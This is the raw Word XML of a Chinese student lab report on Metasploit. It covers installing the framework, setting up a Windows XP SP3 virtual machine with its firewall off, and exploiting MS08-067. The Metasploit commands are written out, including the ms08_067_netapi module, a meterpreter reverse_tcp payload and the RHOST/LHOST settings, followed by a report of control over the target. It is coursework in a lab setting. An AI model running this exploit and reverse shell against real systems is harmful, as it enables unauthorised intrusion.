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numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd w:val="0"/>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/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Calibri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实验题目：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_Toc530950998"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>实验</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>八安全测试平台Metasploit使用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安全漏洞是安全方面的焦点问题。漏洞的发现是可遇而不可求的。漏洞的验证和使用也不是那么容易的。而</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>是：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="42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宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>The world’s most used penetration testing framework.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:adjustRightInd w:val="0"/>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto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实验内容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安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Metasploit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用虚拟机建立目标机（target，测试攻击的目标）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测试MS08-067（选）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找一个新近的漏洞，重现演示</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto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00" w:lineRule="auto"/>
              <w:ind w:left="420" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28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>Linux下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</w:rPr>
              <w:t>安装Metasploit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="84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 xml:space="preserve"> 安装curl 方便下载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</w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="84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 xml:space="preserve">通过curl命令下载安装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</w:rPr>
              <w:t>Metasploit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eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>：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5096510" cy="893445"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="190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10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3646170" cy="2735580"/>
                  <wp:effectExtent l="0" t="0" r="1143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273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jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pP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2371090" cy="2075180"/>
                  <wp:effectExtent l="0" t="0" r="1016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2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</w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="840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 xml:space="preserve">安装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</w:rPr>
              <w:t>Metasploit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>完成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eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="1200" w:firstLineChars="50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  <w:t>输入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</w:rPr>
              <w:t>msfconsole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  <w:t xml:space="preserve"> 进入：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
            </w:pP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4158615" cy="3120390"/>
                  <wp:effectExtent l="0" t="0" r="13335" b="381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615" cy="312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jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="420" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28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</w:rPr>
              <w:t>安装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>目标机Target：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ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22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1"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>本实验测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MS08-067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1"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>所以安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20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0"/>
              </w:rPr>
              <w:t>XP/SP3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>进行实验，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1"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>从可以直接在网上下载纯净版的windos XP SP3系统，并放到VMware虚拟机中即可:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="24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2903220" cy="2537460"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="1524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253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  <w:t>做一下几个准备工作：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr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  <w:t>关闭防火墙</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:left="1440" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0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  <w:t>查询IP地址（121.250.213.15）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr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1"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>在C盘中建一个文件夹test 方便之后测试</w:t>
            </w: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3322320" cy="2493010"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="254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2493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300" w:lineRule="auto"/>
              <w:ind w:left="420" w:leftChars="0"/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 xml:space="preserve"> 测试MS08-067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>：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2"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">       查询攻击者的IP：121.250.213.41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6"/>
              </w:numPr>
              <w:ind w:left="4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查找漏洞ms08-067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color w:val="0070C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  <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Search ms08-067</w:t>
            </w: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4764405" cy="1943100"/>
                  <wp:effectExtent l="0" t="0" r="17145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05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</w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:ind w:left="4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加载模块ms08_067_netapi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="720" w:firstLineChars="300"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>use exploit/windows/smb/ms08_067_netapi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pP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4706620" cy="613410"/>
                  <wp:effectExtent l="0" t="0" r="17780" b="1524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620" cy="61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4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加载模块ms08_067_netapi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="720" w:firstLineChars="300"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>set payload windows/meterpreter/reverse_tcp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4721860" cy="574040"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="1651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860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4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设置被攻击者IP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="720" w:firstLineChars="300"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>set RHOST 172.28.1.20</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5128260" cy="546100"/>
                  <wp:effectExtent l="0" t="0" r="15240" b="635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6"/>
              </w:numPr>
              <w:ind w:left="4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设置攻击者IP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="360" w:leftChars="0" w:firstLine="240" w:firstLineChars="100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hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>set LHOST 172.28.1.22</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240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5130165" cy="477520"/>
                  <wp:effectExtent l="0" t="0" r="13335" b="1778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4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设置成功开始攻击：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ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>exploit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="24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5720" cy="1438275"/>
                  <wp:effectExtent l="0" t="0" r="17780" b="9525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/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="24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4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攻击成功已经控制了目标机，可以执行windos下的指令ipconfig:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3329940" cy="2835275"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="3175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283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jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:p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可以看到显示了目标机的IP地址</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:p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ind w:left="4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也可以增加添加文件等操作：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876040" cy="1247775"/>
                  <wp:effectExtent l="0" t="0" r="10160" b="9525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04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center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3478530" cy="2610485"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="18415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530" cy="261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bookmarkStart w:id="1" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="1"/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ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="24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208AF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E7C208AF"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircleChinese"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="26070840"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2607084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D77C1EE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3D77C1E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492F2D9E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="492F2D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D8B0D98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D8B0D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F57594B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7F57594B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircleChinese"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0" w:firstLine="0" w:firstLineChars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449DB"/>
    <w:rsid w:val="09886CC0"/>
    <w:rsid w:val="0AEC582A"/>
    <w:rsid w:val="0B9E7A7C"/>
    <w:rsid w:val="0F6B0200"/>
    <w:rsid w:val="110F6F25"/>
    <w:rsid w:val="12DE2DD7"/>
    <w:rsid w:val="13EE22E5"/>
    <w:rsid w:val="15D70020"/>
    <w:rsid w:val="18C91169"/>
    <w:rsid w:val="193E7E12"/>
    <w:rsid w:val="19EC762B"/>
    <w:rsid w:val="1A7B7857"/>
    <w:rsid w:val="21515C1F"/>
    <w:rsid w:val="21F625ED"/>
    <w:rsid w:val="2218057C"/>
    <w:rsid w:val="2406421C"/>
    <w:rsid w:val="24C60021"/>
    <w:rsid w:val="27C0615E"/>
    <w:rsid w:val="2801145D"/>
    <w:rsid w:val="28102FE7"/>
    <w:rsid w:val="28EC4FC7"/>
    <w:rsid w:val="298B470A"/>
    <w:rsid w:val="2A0F6169"/>
    <w:rsid w:val="2F541F44"/>
    <w:rsid w:val="39CA365A"/>
    <w:rsid w:val="3CF54F86"/>
    <w:rsid w:val="3D1950E8"/>
    <w:rsid w:val="3D3D0E33"/>
    <w:rsid w:val="3DD46B93"/>
    <w:rsid w:val="3E4D5AA8"/>
    <w:rsid w:val="3E585CA8"/>
    <w:rsid w:val="40B624C7"/>
    <w:rsid w:val="44F90809"/>
    <w:rsid w:val="45972443"/>
    <w:rsid w:val="459C2CE6"/>
    <w:rsid w:val="4A933989"/>
    <w:rsid w:val="4B827A58"/>
    <w:rsid w:val="4C4F57AF"/>
    <w:rsid w:val="52EA505F"/>
    <w:rsid w:val="534945C7"/>
    <w:rsid w:val="54E320EB"/>
    <w:rsid w:val="586617D3"/>
    <w:rsid w:val="5DFB22DE"/>
    <w:rsid w:val="5E80451E"/>
    <w:rsid w:val="631E2726"/>
    <w:rsid w:val="63BB094F"/>
    <w:rsid w:val="64023548"/>
    <w:rsid w:val="64607B73"/>
    <w:rsid w:val="66226667"/>
    <w:rsid w:val="66FE54E6"/>
    <w:rsid w:val="6BC8682B"/>
    <w:rsid w:val="6E7A0E08"/>
    <w:rsid w:val="71625998"/>
    <w:rsid w:val="71BA7928"/>
    <w:rsid w:val="75065360"/>
    <w:rsid w:val="7597335D"/>
    <w:rsid w:val="7C227DE0"/>
    <w:rsid w:val="7C39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Hyperlink"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="333333"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="quote"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="6B6B6B"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="tip"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999999"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="name"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="2E2E2E"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="14">
    <w:name w:val="article-type"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="article-type1"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="red"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="tx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2018-12-03T11:07:50Z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